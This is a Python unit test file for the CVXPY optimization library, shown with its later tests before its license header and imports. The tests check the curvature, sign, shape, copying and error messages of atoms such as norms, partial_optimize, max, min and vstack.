# As get_data() returns a Constant, we have to check the value
self.assertEqual(copy.get_data()[0].value, atom.get_data()[0].value)
# Test copy with new args
copy = atom.copy(args=[self.y])
self.assertTrue(type(copy) is type(atom))
self.assertTrue(copy.args[0] is self.y)
self.assertEqual(copy.get_data()[0].value, atom.get_data()[0].value)
def test_sum_largest(self) -> None:
"""Test the sum_largest atom and related atoms.
"""
with self.assertRaises(Exception) as cm:
cp.sum_largest(self.x, -1)
self.assertEqual(str(cm.exception),
"Second argument must be a positive integer.")
with self.assertRaises(Exception) as cm:
cp.lambda_sum_largest(self.x, 2.4)
self.assertEqual(str(cm.exception),
"First argument must be a square matrix.")
with self.assertRaises(Exception) as cm:
cp.lambda_sum_largest(Variable((2, 2)), 2.4)
self.assertEqual(str(cm.exception),
"Second argument must be a positive integer.")
with self.assertRaises(ValueError) as cm:
cp.lambda_sum_largest([[1, 2], [3, 4]], 2).value
self.assertEqual(str(cm.exception),
"Input matrix was not Hermitian/symmetric.")
# Test copy with args=None
atom = cp.sum_largest(self.x, 2)
copy = atom.copy()
self.assertTrue(type(copy) is type(atom))
# A new object is constructed, so copy.args == atom.args but copy.args
# is not atom.args.
self.assertEqual(copy.args, atom.args)
self.assertFalse(copy.args is atom.args)
self.assertEqual(copy.get_data(), atom.get_data())
# Test copy with new args
copy = atom.copy(args=[self.y])
self.assertTrue(type(copy) is type(atom))
self.assertTrue(copy.args[0] is self.y)
self.assertEqual(copy.get_data(), atom.get_data())
# Test copy with lambda_sum_largest, which is in fact an AddExpression
atom = cp.lambda_sum_largest(Variable((2, 2)), 2)
copy = atom.copy()
self.assertTrue(type(copy) is type(atom))
def test_sum_smallest(self) -> None:
"""Test the sum_smallest atom and related atoms.
"""
with self.assertRaises(Exception) as cm:
cp.sum_smallest(self.x, -1)
self.assertEqual(str(cm.exception),
"Second argument must be a positive integer.")
with self.assertRaises(Exception) as cm:
cp.lambda_sum_smallest(Variable((2, 2)), 2.4)
self.assertEqual(str(cm.exception),
"Second argument must be a positive integer.")
def test_index(self) -> None:
"""Test the copy function for index.
"""
# Test copy with args=None
shape = (5, 4)
A = Variable(shape)
atom = A[0:2, 0:1]
copy = atom.copy()
self.assertTrue(type(copy) is type(atom))
# A new object is constructed, so copy.args == atom.args but copy.args
# is not atom.args.
self.assertEqual(copy.args, atom.args)
self.assertFalse(copy.args is atom.args)
self.assertEqual(copy.get_data(), atom.get_data())
# Test copy with new args
B = Variable((4, 5))
copy = atom.copy(args=[B])
self.assertTrue(type(copy) is type(atom))
self.assertTrue(copy.args[0] is B)
self.assertEqual(copy.get_data(), atom.get_data())
def test_bmat(self) -> None:
"""Test the bmat atom.
"""
v_np = np.ones((3, 1))
expr = np.vstack([np.hstack([v_np, v_np]),
np.hstack([np.zeros((2, 1)),
np.array([[1, 2]]).T])])
self.assertEqual(expr.shape, (5, 2))
const = np.vstack([np.hstack([v_np, v_np]),
np.hstack([np.zeros((2, 1)),
np.array([[1, 2]]).T])])
self.assertItemsAlmostEqual(expr, const)
def test_conv(self) -> None:
"""Test the conv atom.
"""
a = np.ones((3, 1))
b = Parameter(2, nonneg=True)
expr = cp.conv(a, b)
assert expr.is_nonneg()
self.assertEqual(expr.shape, (4, 1))
b = Parameter(2, nonpos=True)
expr = cp.conv(a, b)
assert expr.is_nonpos()
with self.assertRaises(Exception) as cm:
cp.conv(self.x, -1)
self.assertEqual(str(cm.exception),
"The first argument to conv must be constant.")
with self.assertRaises(Exception) as cm:
cp.conv([[0, 1], [0, 1]], self.x)
self.assertEqual(str(cm.exception),
"The arguments to conv must resolve to vectors.")
def test_kron(self) -> None:
"""Test the kron atom.
"""
a = np.ones((3, 2))
b = Parameter((2, 1), nonneg=True)
expr = cp.kron(a, b)
assert expr.is_nonneg()
self.assertEqual(expr.shape, (6, 2))
b = Parameter((2, 1), nonpos=True)
expr = cp.kron(a, b)
assert expr.is_nonpos()
with self.assertRaises(Exception) as cm:
cp.kron(self.x, -1)
self.assertEqual(str(cm.exception),
"The first argument to kron must be constant.")
def test_partial_optimize_dcp(self) -> None:
"""Test DCP properties of partial optimize.
"""
# Evaluate the 1-norm in the usual way (i.e., in epigraph form).
dims = 3
x, t = Variable(dims), Variable(dims)
p2 = Problem(cp.Minimize(cp.sum(t)), [-t <= x, x <= t])
g = partial_optimize(p2, [t], [x])
self.assertEqual(g.curvature, s.CONVEX)
p2 = Problem(cp.Maximize(cp.sum(t)), [-t <= x, x <= t])
g = partial_optimize(p2, [t], [x])
self.assertEqual(g.curvature, s.CONCAVE)
p2 = Problem(cp.Maximize(cp.square(t[0])), [-t <= x, x <= t])
g = partial_optimize(p2, [t], [x])
self.assertEqual(g.is_convex(), False)
self.assertEqual(g.is_concave(), False)
def test_partial_optimize_eval_1norm(self) -> None:
"""Test the partial_optimize atom.
"""
# Evaluate the 1-norm in the usual way (i.e., in epigraph form).
dims = 3
x, t = Variable(dims), Variable(dims)
xval = [-5]*dims
p1 = Problem(cp.Minimize(cp.sum(t)), [-t <= xval, xval <= t])
p1.solve()
# Minimize the 1-norm via partial_optimize.
p2 = Problem(cp.Minimize(cp.sum(t)), [-t <= x, x <= t])
g = partial_optimize(p2, [t], [x])
p3 = Problem(cp.Minimize(g), [x == xval])
p3.solve()
self.assertAlmostEqual(p1.value, p3.value)
# Minimize the 1-norm using maximize.
p2 = Problem(cp.Maximize(cp.sum(-t)), [-t <= x, x <= t])
g = partial_optimize(p2, opt_vars=[t])
p3 = Problem(cp.Maximize(g), [x == xval])
p3.solve()
self.assertAlmostEqual(p1.value, -p3.value)
# Try leaving out args.
# Minimize the 1-norm via partial_optimize.
p2 = Problem(cp.Minimize(cp.sum(t)), [-t <= x, x <= t])
g = partial_optimize(p2, opt_vars=[t])
p3 = Problem(cp.Minimize(g), [x == xval])
p3.solve()
self.assertAlmostEqual(p1.value, p3.value)
# Minimize the 1-norm via partial_optimize.
g = partial_optimize(p2, dont_opt_vars=[x])
p3 = Problem(cp.Minimize(g), [x == xval])
p3.solve()
self.assertAlmostEqual(p1.value, p3.value)
with self.assertRaises(Exception) as cm:
g = partial_optimize(p2)
self.assertEqual(str(cm.exception),
"partial_optimize called with neither opt_vars nor dont_opt_vars.")
with self.assertRaises(Exception) as cm:
g = partial_optimize(p2, [], [x])
self.assertEqual(str(cm.exception),
("If opt_vars and new_opt_vars are both specified, "
"they must contain all variables in the problem.")
)
def test_partial_optimize_min_1norm(self) -> None:
# Minimize the 1-norm in the usual way
dims = 3
x, t = Variable(dims), Variable(dims)
p1 = Problem(Minimize(cp.sum(t)), [-t <= x, x <= t])
# Minimize the 1-norm via partial_optimize
g = partial_optimize(p1, [t], [x])
p2 = Problem(Minimize(g))
p2.solve()
p1.solve()
self.assertAlmostEqual(p1.value, p2.value)
def test_partial_optimize_simple_problem(self) -> None:
x, y = Variable(1), Variable(1)
# Solve the (simple) two-stage problem by "combining" the two stages
# (i.e., by solving a single linear program)
p1 = Problem(Minimize(x+y), [x+y >= 3, y >= 4, x >= 5])
p1.solve()
# Solve the two-stage problem via partial_optimize
p2 = Problem(Minimize(y), [x+y >= 3, y >= 4])
g = partial_optimize(p2, [y], [x])
p3 = Problem(Minimize(x+g), [x >= 5])
p3.solve()
self.assertAlmostEqual(p1.value, p3.value)
@unittest.skipUnless(len(INSTALLED_MI_SOLVERS) > 0, 'No mixed-integer solver is installed.')
def test_partial_optimize_special_var(self) -> None:
x, y = Variable(boolean=True), Variable(integer=True)
# Solve the (simple) two-stage problem by "combining" the two stages
# (i.e., by solving a single linear program)
p1 = Problem(Minimize(x+y), [x+y >= 3, y >= 4, x >= 5])
p1.solve(solver=cp.ECOS_BB)
# Solve the two-stage problem via partial_optimize
p2 = Problem(Minimize(y), [x+y >= 3, y >= 4])
g = partial_optimize(p2, [y], [x])
p3 = Problem(Minimize(x+g), [x >= 5])
p3.solve(solver=cp.ECOS_BB)
self.assertAlmostEqual(p1.value, p3.value)
def test_partial_optimize_special_constr(self) -> None:
x, y = Variable(1), Variable(1)
# Solve the (simple) two-stage problem by "combining" the two stages
# (i.e., by solving a single linear program)
p1 = Problem(Minimize(x + cp.exp(y)), [x+y >= 3, y >= 4, x >= 5])
p1.solve()
# Solve the two-stage problem via partial_optimize
p2 = Problem(Minimize(cp.exp(y)), [x+y >= 3, y >= 4])
g = partial_optimize(p2, [y], [x])
p3 = Problem(Minimize(x+g), [x >= 5])
p3.solve()
self.assertAlmostEqual(p1.value, p3.value)
def test_partial_optimize_params(self) -> None:
"""Test partial optimize with parameters.
"""
x, y = Variable(1), Variable(1)
gamma = Parameter()
# Solve the (simple) two-stage problem by "combining" the two stages
# (i.e., by solving a single linear program)
p1 = Problem(Minimize(x+y), [x+y >= gamma, y >= 4, x >= 5])
gamma.value = 3
p1.solve()
# Solve the two-stage problem via partial_optimize
p2 = Problem(Minimize(y), [x+y >= gamma, y >= 4])
g = partial_optimize(p2, [y], [x])
p3 = Problem(Minimize(x+g), [x >= 5])
p3.solve()
self.assertAlmostEqual(p1.value, p3.value)
def test_partial_optimize_numeric_fn(self) -> None:
x, y = Variable(), Variable()
xval = 4
# Solve the (simple) two-stage problem by "combining" the two stages
# (i.e., by solving a single linear program)
p1 = Problem(Minimize(y), [xval+y >= 3])
p1.solve()
# Solve the two-stage problem via partial_optimize
constr = [y >= -100]
p2 = Problem(Minimize(y), [x+y >= 3] + constr)
g = partial_optimize(p2, [y], [x])
x.value = xval
y.value = 42
constr[0].dual_variables[0].value = 42
result = g.value
self.assertAlmostEqual(result, p1.value)
self.assertAlmostEqual(y.value, 42)
self.assertAlmostEqual(constr[0].dual_value, 42)
# No variables optimized over.
p2 = Problem(Minimize(y), [x+y >= 3])
g = partial_optimize(p2, [], [x, y])
x.value = xval
y.value = 42
p2.constraints[0].dual_variables[0].value = 42
result = g.value
self.assertAlmostEqual(result, y.value)
self.assertAlmostEqual(y.value, 42)
self.assertAlmostEqual(p2.constraints[0].dual_value, 42)
def test_partial_optimize_stacked(self) -> None:
"""Minimize the 1-norm in the usual way
"""
dims = 3
x = Variable(dims, name='x')
t = Variable(dims, name='t')
p1 = Problem(Minimize(cp.sum(t)), [-t <= x, x <= t])
# Minimize the 1-norm via partial_optimize
g = partial_optimize(p1, [t], [x])
g2 = partial_optimize(Problem(Minimize(g)), [x])
p2 = Problem(Minimize(g2))
p2.solve()
p1.solve()
self.assertAlmostEqual(p1.value, p2.value)
def test_nonnegative_variable(self) -> None:
"""Test the NonNegative Variable class.
"""
x = Variable(nonneg=True)
p = Problem(Minimize(5+x), [x >= 3])
p.solve()
self.assertAlmostEqual(p.value, 8)
self.assertAlmostEqual(x.value, 3)
def test_mixed_norm(self) -> None:
"""Test mixed norm.
"""
y = Variable((5, 5))
obj = Minimize(cp.mixed_norm(y, "inf", 1))
prob = Problem(obj, [y == np.ones((5, 5))])
result = prob.solve()
self.assertAlmostEqual(result, 5)
def test_mat_norms(self) -> None:
"""Test that norm1 and normInf match definition for matrices.
"""
A = np.array([[1, 2], [3, 4]])
print(A)
X = Variable((2, 2))
obj = Minimize(cp.norm(X, 1))
prob = cp.Problem(obj, [X == A])
result = prob.solve()
print(result)
self.assertAlmostEqual(result, cp.norm(A, 1).value, places=3)
obj = Minimize(cp.norm(X, np.inf))
prob = cp.Problem(obj, [X == A])
result = prob.solve()
print(result)
self.assertAlmostEqual(result, cp.norm(A, np.inf).value, places=3)
def test_indicator(self) -> None:
x = cp.Variable()
constraints = [0 <= x, x <= 1]
expr = cp.transforms.indicator(constraints)
x.value = .5
self.assertEqual(expr.value, 0.0)
x.value = 2
self.assertEqual(expr.value, np.inf)
def test_log_det(self) -> None:
# test malformed input
with self.assertRaises(ValueError) as cm:
cp.log_det([[1, 2], [3, 4]]).value
self.assertEqual(str(cm.exception),
"Input matrix was not Hermitian/symmetric.")
def test_lambda_max(self) -> None:
with self.assertRaises(ValueError) as cm:
cp.lambda_max([[1, 2], [3, 4]]).value
self.assertEqual(str(cm.exception),
"Input matrix was not Hermitian/symmetric.")
def test_diff(self) -> None:
"""Test the diff atom.
"""
A = cp.Variable((20, 10))
B = np.zeros((20, 10))
self.assertEqual(cp.diff(A, axis=0).shape,
np.diff(B, axis=0).shape)
self.assertEqual(cp.diff(A, axis=1).shape,
np.diff(B, axis=1).shape)
def test_log_normcdf(self) -> None:
self.assertEqual(cp.log_normcdf(self.x).sign, s.NONPOS)
self.assertEqual(cp.log_normcdf(self.x).curvature, s.CONCAVE)
for x in range(-4, 5):
self.assertAlmostEqual(
np.log(scipy.stats.norm.cdf(x)),
cp.log_normcdf(x).value,
places=None,
delta=1e-2,
)
y = Variable((2, 2))
obj = Minimize(cp.sum(-cp.log_normcdf(y)))
prob = Problem(obj, [y == 2])
result = prob.solve()
self.assertAlmostEqual(
-result, 4 * np.log(scipy.stats.norm.cdf(2)), places=None, delta=1e-2
)
|
"""
Copyright 2013 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import cvxpy as cp
import cvxpy.settings as s
from cvxpy.transforms.partial_optimize import partial_optimize
from cvxpy.expressions.variable import Variable
from cvxpy.expressions.constants import Parameter, Constant
from cvxpy.reductions.solvers.defines import INSTALLED_MI_SOLVERS
import numpy as np
from cvxpy import Problem, Minimize
from cvxpy.tests.base_test import BaseTest
import unittest
import scipy.sparse as sp
import scipy.stats
class TestAtoms(BaseTest):
""" Unit tests for the atoms module. """
def setUp(self) -> None:
self.a = Variable(name='a')
self.x = Variable(2, name='x')
self.y = Variable(2, name='y')
self.A = Variable((2, 2), name='A')
self.B = Variable((2, 2), name='B')
self.C = Variable((3, 2), name='C')
def test_add_expr_copy(self) -> None:
"""Test the copy function for AddExpresion class.
"""
atom = self.x + self.y
copy = atom.copy()
self.assertTrue(type(copy) is type(atom))
# A new object is constructed, so copy.args == atom.args but copy.args
# is not atom.args.
self.assertEqual(copy.args, atom.args)
self.assertFalse(copy.args is atom.args)
self.assertEqual(copy.get_data(), atom.get_data())
# Test copy with new args
copy = atom.copy(args=[self.A, self.B])
self.assertTrue(type(copy) is type(atom))
self.assertTrue(copy.args[0] is self.A)
self.assertTrue(copy.args[1] is self.B)
self.assertEqual(copy.get_data(), atom.get_data())
def test_norm_inf(self) -> None:
"""Test the norm_inf class.
"""
exp = self.x+self.y
atom = cp.norm_inf(exp)
# self.assertEqual(atom.name(), "norm_inf(x + y)")
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
assert atom.is_convex()
assert (-atom).is_concave()
self.assertEqual(cp.norm_inf(atom).curvature, s.CONVEX)
self.assertEqual(cp.norm_inf(-atom).curvature, s.CONVEX)
def test_norm1(self) -> None:
"""Test the norm1 class.
"""
exp = self.x+self.y
atom = cp.norm1(exp)
# self.assertEqual(atom.name(), "norm1(x + y)")
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
self.assertEqual(cp.norm1(atom).curvature, s.CONVEX)
self.assertEqual(cp.norm1(-atom).curvature, s.CONVEX)
def test_list_input(self) -> None:
"""Test that list input is rejected.
"""
with self.assertRaises(Exception) as cm:
cp.max([cp.Variable(), 1])
self.assertTrue(str(cm.exception) in (
"The input must be a single CVXPY Expression, not a list. "
"Combine Expressions using atoms such as bmat, hstack, and vstack."))
with self.assertRaises(Exception) as cm:
cp.norm([1, cp.Variable()])
self.assertTrue(str(cm.exception) in (
"The input must be a single CVXPY Expression, not a list. "
"Combine Expressions using atoms such as bmat, hstack, and vstack."))
x = cp.Variable()
y = cp.Variable()
with self.assertRaises(Exception) as cm:
cp.norm([x, y]) <= 1
self.assertTrue(str(cm.exception) in (
"The input must be a single CVXPY Expression, not a list. "
"Combine Expressions using atoms such as bmat, hstack, and vstack."))
def test_quad_form(self) -> None:
"""Test quad_form atom.
"""
P = Parameter((2, 2), symmetric=True)
expr = cp.quad_form(self.x, P)
assert not expr.is_dcp()
def test_power(self) -> None:
"""Test the power class.
"""
from fractions import Fraction
for shape in [(1, 1), (3, 1), (2, 3)]:
x = Variable(shape)
y = Variable(shape)
exp = x + y
for p in 0, 1, 2, 3, 2.7, .67, -1, -2.3, Fraction(4, 5):
atom = cp.power(exp, p)
self.assertEqual(atom.shape, shape)
if p > 1 or p < 0:
self.assertEqual(atom.curvature, s.CONVEX)
elif p == 1:
self.assertEqual(atom.curvature, s.AFFINE)
elif p == 0:
self.assertEqual(atom.curvature, s.CONSTANT)
else:
self.assertEqual(atom.curvature, s.CONCAVE)
if p != 1:
self.assertEqual(atom.sign, s.NONNEG)
# Test copy with args=None
copy = atom.copy()
self.assertTrue(type(copy) is type(atom))
# A new object is constructed, so copy.args == atom.args but copy.args
# is not atom.args.
self.assertEqual(copy.args, atom.args)
self.assertFalse(copy.args is atom.args)
self.assertEqual(copy.get_data(), atom.get_data())
# Test copy with new args
copy = atom.copy(args=[self.y])
self.assertTrue(type(copy) is type(atom))
self.assertTrue(copy.args[0] is self.y)
self.assertEqual(copy.get_data(), atom.get_data())
assert cp.power(-1, 2).value == 1
# Test the geo_mean class.
def test_geo_mean(self) -> None:
atom = cp.geo_mean(self.x)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONCAVE)
self.assertEqual(atom.sign, s.NONNEG)
# Test copy with args=None
copy = atom.copy()
self.assertTrue(type(copy) is type(atom))
# A new object is constructed, so copy.args == atom.args but copy.args
# is not atom.args.
self.assertEqual(copy.args, atom.args)
self.assertFalse(copy.args is atom.args)
self.assertEqual(copy.get_data(), atom.get_data())
# Test copy with new args
copy = atom.copy(args=[self.y])
self.assertTrue(type(copy) is type(atom))
self.assertTrue(copy.args[0] is self.y)
self.assertEqual(copy.get_data(), atom.get_data())
# Test the harmonic_mean class.
def test_harmonic_mean(self) -> None:
atom = cp.harmonic_mean(self.x)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONCAVE)
self.assertEqual(atom.sign, s.NONNEG)
# Test the pnorm class.
def test_pnorm(self) -> None:
atom = cp.pnorm(self.x, p=1.5)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
self.assertEqual(atom.sign, s.NONNEG)
atom = cp.pnorm(self.x, p=1)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
self.assertEqual(atom.sign, s.NONNEG)
atom = cp.pnorm(self.x, p=2)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
self.assertEqual(atom.sign, s.NONNEG)
expr = cp.norm(self.A, 2, axis=0)
self.assertEqual(expr.shape, (2,))
atom = cp.pnorm(self.x, p='inf')
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
self.assertEqual(atom.sign, s.NONNEG)
atom = cp.pnorm(self.x, p='Inf')
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
self.assertEqual(atom.sign, s.NONNEG)
atom = cp.pnorm(self.x, p=np.inf)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
self.assertEqual(atom.sign, s.NONNEG)
atom = cp.pnorm(self.x, p=.5)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONCAVE)
self.assertEqual(atom.sign, s.NONNEG)
atom = cp.pnorm(self.x, p=.7)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONCAVE)
self.assertEqual(atom.sign, s.NONNEG)
atom = cp.pnorm(self.x, p=-.1)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONCAVE)
self.assertEqual(atom.sign, s.NONNEG)
atom = cp.pnorm(self.x, p=-1)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONCAVE)
self.assertEqual(atom.sign, s.NONNEG)
atom = cp.pnorm(self.x, p=-1.3)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONCAVE)
self.assertEqual(atom.sign, s.NONNEG)
# Test copy with args=None
copy = atom.copy()
self.assertTrue(type(copy) is type(atom))
# A new object is constructed, so copy.args == atom.args but copy.args
# is not atom.args.
self.assertEqual(copy.args, atom.args)
self.assertFalse(copy.args is atom.args)
self.assertEqual(copy.get_data(), atom.get_data())
# Test copy with new args
copy = atom.copy(args=[self.y])
self.assertTrue(type(copy) is type(atom))
self.assertTrue(copy.args[0] is self.y)
self.assertEqual(copy.get_data(), atom.get_data())
def test_matrix_norms(self) -> None:
"""
Matrix 1-norm, 2-norm (sigma_max), infinity-norm,
Frobenius norm, and nuclear-norm.
"""
for p in [1, 2, np.inf, 'fro', 'nuc']:
for var in [self.A, self.C]:
atom = cp.norm(var, p)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
self.assertEqual(atom.sign, s.NONNEG)
var.value = np.random.randn(*var.shape)
self.assertAlmostEqual(atom.value, np.linalg.norm(var.value, ord=p))
pass
def test_quad_over_lin(self) -> None:
# Test quad_over_lin DCP.
atom = cp.quad_over_lin(cp.square(self.x), self.a)
self.assertEqual(atom.curvature, s.CONVEX)
atom = cp.quad_over_lin(-cp.square(self.x), self.a)
self.assertEqual(atom.curvature, s.CONVEX)
atom = cp.quad_over_lin(cp.sqrt(self.x), self.a)
self.assertEqual(atom.curvature, s.UNKNOWN)
assert not atom.is_dcp()
# Test quad_over_lin shape validation.
with self.assertRaises(Exception) as cm:
cp.quad_over_lin(self.x, self.x)
self.assertEqual(str(cm.exception),
"The second argument to quad_over_lin must be a scalar.")
def test_elemwise_arg_count(self) -> None:
"""Test arg count for max and min variants.
"""
with self.assertRaises(Exception) as cm:
cp.maximum(1)
self.assertTrue(str(cm.exception) in (
"__init__() takes at least 3 arguments (2 given)",
"__init__() missing 1 required positional argument: 'arg2'"))
with self.assertRaises(Exception) as cm:
cp.minimum(1)
self.assertTrue(str(cm.exception) in (
"__init__() takes at least 3 arguments (2 given)",
"__init__() missing 1 required positional argument: 'arg2'"))
def test_matrix_frac(self) -> None:
"""Test for the matrix_frac atom.
"""
atom = cp.matrix_frac(self.x, self.A)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
# Test matrix_frac shape validation.
with self.assertRaises(Exception) as cm:
cp.matrix_frac(self.x, self.C)
self.assertEqual(str(cm.exception),
"The second argument to matrix_frac must be a square matrix.")
with self.assertRaises(Exception) as cm:
cp.matrix_frac(Variable(3), self.A)
self.assertEqual(str(cm.exception),
"The arguments to matrix_frac have incompatible dimensions.")
def test_max(self) -> None:
"""Test max.
"""
# One arg, test sign.
self.assertEqual(cp.max(1).sign, s.NONNEG)
self.assertEqual(cp.max(-2).sign, s.NONPOS)
self.assertEqual(cp.max(Variable()).sign, s.UNKNOWN)
self.assertEqual(cp.max(0).sign, s.ZERO)
# Test with axis argument.
self.assertEqual(cp.max(Variable(2), axis=0, keepdims=True).shape, (1,))
self.assertEqual(cp.max(Variable(2), axis=1).shape, (2,))
self.assertEqual(cp.max(Variable((2, 3)), axis=0, keepdims=True).shape, (1, 3))
self.assertEqual(cp.max(Variable((2, 3)), axis=1).shape, (2,))
# Invalid axis.
with self.assertRaises(Exception) as cm:
cp.max(self.x, axis=4)
self.assertEqual(str(cm.exception),
"Invalid argument for axis.")
def test_min(self) -> None:
"""Test min.
"""
# One arg, test sign.
self.assertEqual(cp.min(1).sign, s.NONNEG)
self.assertEqual(cp.min(-2).sign, s.NONPOS)
self.assertEqual(cp.min(Variable()).sign, s.UNKNOWN)
self.assertEqual(cp.min(0).sign, s.ZERO)
# Test with axis argument.
self.assertEqual(cp.min(Variable(2), axis=0).shape, tuple())
self.assertEqual(cp.min(Variable(2), axis=1).shape, (2,))
self.assertEqual(cp.min(Variable((2, 3)), axis=0).shape, (3,))
self.assertEqual(cp.min(Variable((2, 3)), axis=1).shape, (2,))
# Invalid axis.
with self.assertRaises(Exception) as cm:
cp.min(self.x, axis=4)
self.assertEqual(str(cm.exception),
"Invalid argument for axis.")
# Test sign logic for maximum.
def test_maximum_sign(self) -> None:
# Two args.
self.assertEqual(cp.maximum(1, 2).sign, s.NONNEG)
self.assertEqual(cp.maximum(1, Variable()).sign, s.NONNEG)
self.assertEqual(cp.maximum(1, -2).sign, s.NONNEG)
self.assertEqual(cp.maximum(1, 0).sign, s.NONNEG)
self.assertEqual(cp.maximum(Variable(), 0).sign, s.NONNEG)
self.assertEqual(cp.maximum(Variable(), Variable()).sign, s.UNKNOWN)
self.assertEqual(cp.maximum(Variable(), -2).sign, s.UNKNOWN)
self.assertEqual(cp.maximum(0, 0).sign, s.ZERO)
self.assertEqual(cp.maximum(0, -2).sign, s.ZERO)
self.assertEqual(cp.maximum(-3, -2).sign, s.NONPOS)
# Many args.
self.assertEqual(cp.maximum(-2, Variable(), 0, -1, Variable(), 1).sign,
s.NONNEG)
# Promotion.
self.assertEqual(cp.maximum(1, Variable(2)).sign,
s.NONNEG)
self.assertEqual(cp.maximum(1, Variable(2)).shape,
(2,))
# Test sign logic for minimum.
def test_minimum_sign(self) -> None:
# Two args.
self.assertEqual(cp.minimum(1, 2).sign, s.NONNEG)
self.assertEqual(cp.minimum(1, Variable()).sign, s.UNKNOWN)
self.assertEqual(cp.minimum(1, -2).sign, s.NONPOS)
self.assertEqual(cp.minimum(1, 0).sign, s.ZERO)
self.assertEqual(cp.minimum(Variable(), 0).sign, s.NONPOS)
self.assertEqual(cp.minimum(Variable(), Variable()).sign, s.UNKNOWN)
self.assertEqual(cp.minimum(Variable(), -2).sign, s.NONPOS)
self.assertEqual(cp.minimum(0, 0).sign, s.ZERO)
self.assertEqual(cp.minimum(0, -2).sign, s.NONPOS)
self.assertEqual(cp.minimum(-3, -2).sign, s.NONPOS)
# Many args.
self.assertEqual(cp.minimum(-2, Variable(), 0, -1, Variable(), 1).sign,
s.NONPOS)
# Promotion.
self.assertEqual(cp.minimum(-1, Variable(2)).sign,
s.NONPOS)
self.assertEqual(cp.minimum(-1, Variable(2)).shape,
(2,))
def test_sum(self) -> None:
"""Test the sum atom.
"""
self.assertEqual(cp.sum(1).sign, s.NONNEG)
self.assertEqual(cp.sum(Constant([1, -1])).sign, s.UNKNOWN)
self.assertEqual(cp.sum(Constant([1, -1])).curvature, s.CONSTANT)
self.assertEqual(cp.sum(Variable(2)).sign, s.UNKNOWN)
self.assertEqual(cp.sum(Variable(2)).shape, tuple())
self.assertEqual(cp.sum(Variable(2)).curvature, s.AFFINE)
self.assertEqual(cp.sum(Variable((2, 1)), keepdims=True).shape, (1, 1))
# Mixed curvature.
mat = np.array([[1, -1]])
self.assertEqual(cp.sum(mat @ cp.square(Variable(2))).curvature, s.UNKNOWN)
# Test with axis argument.
self.assertEqual(cp.sum(Variable(2), axis=0).shape, tuple())
self.assertEqual(cp.sum(Variable(2), axis=1).shape, (2,))
self.assertEqual(cp.sum(Variable((2, 3)), axis=0, keepdims=True).shape, (1, 3))
self.assertEqual(cp.sum(Variable((2, 3)), axis=0, keepdims=False).shape, (3,))
self.assertEqual(cp.sum(Variable((2, 3)), axis=1).shape, (2,))
# Invalid axis.
with self.assertRaises(Exception) as cm:
cp.sum(self.x, axis=4)
self.assertEqual(str(cm.exception),
"Invalid argument for axis.")
A = sp.eye(3)
self.assertEqual(cp.sum(A).value, 3)
A = sp.eye(3)
self.assertItemsAlmostEqual(cp.sum(A, axis=0).value, [1, 1, 1])
def test_multiply(self) -> None:
"""Test the multiply atom.
"""
self.assertEqual(cp.multiply([1, -1], self.x).sign, s.UNKNOWN)
self.assertEqual(cp.multiply([1, -1], self.x).curvature, s.AFFINE)
self.assertEqual(cp.multiply([1, -1], self.x).shape, (2,))
pos_param = Parameter(2, nonneg=True)
neg_param = Parameter(2, nonpos=True)
self.assertEqual(cp.multiply(pos_param, pos_param).sign, s.NONNEG)
self.assertEqual(cp.multiply(pos_param, neg_param).sign, s.NONPOS)
self.assertEqual(cp.multiply(neg_param, neg_param).sign, s.NONNEG)
self.assertEqual(cp.multiply(neg_param, cp.square(self.x)).curvature, s.CONCAVE)
# Test promotion.
self.assertEqual(cp.multiply([1, -1], 1).shape, (2,))
self.assertEqual(cp.multiply(1, self.C).shape, self.C.shape)
self.assertEqual(cp.multiply(self.x, [1, -1]).sign, s.UNKNOWN)
self.assertEqual(cp.multiply(self.x, [1, -1]).curvature, s.AFFINE)
self.assertEqual(cp.multiply(self.x, [1, -1]).shape, (2,))
# Test the vstack class.
def test_vstack(self) -> None:
atom = cp.vstack([self.x, self.y, self.x])
self.assertEqual(atom.name(), "Vstack(x, y, x)")
self.assertEqual(atom.shape, (3, 2))
atom = cp.vstack([self.A, self.C, self.B])
self.assertEqual(atom.name(), "Vstack(A, C, B)")
self.assertEqual(atom.shape, (7, 2))
entries = []
for i in range(self.x.shape[0]):
entries.append(self.x[i])
atom = cp.vstack(entries)
self.assertEqual(atom.shape, (2, 1))
# self.assertEqual(atom[1,0].name(), "vstack(x[0,0], x[1,0])[1,0]")
with self.assertRaises(Exception) as cm:
cp.vstack([self.C, 1])
self.assertEqual(str(cm.exception),
"All the input dimensions except for axis 0 must match exactly.")
with self.assertRaises(Exception) as cm:
cp.vstack([self.x, Variable(3)])
self.assertEqual(str(cm.exception),
"All the input dimensions except for axis 0 must match exactly.")
with self.assertRaises(TypeError) as cm:
cp.vstack()
def test_reshape(self) -> None:
"""Test the reshape class.
"""
expr = cp.reshape(self.A, (4, 1))
self.assertEqual(expr.sign, s.UNKNOWN)
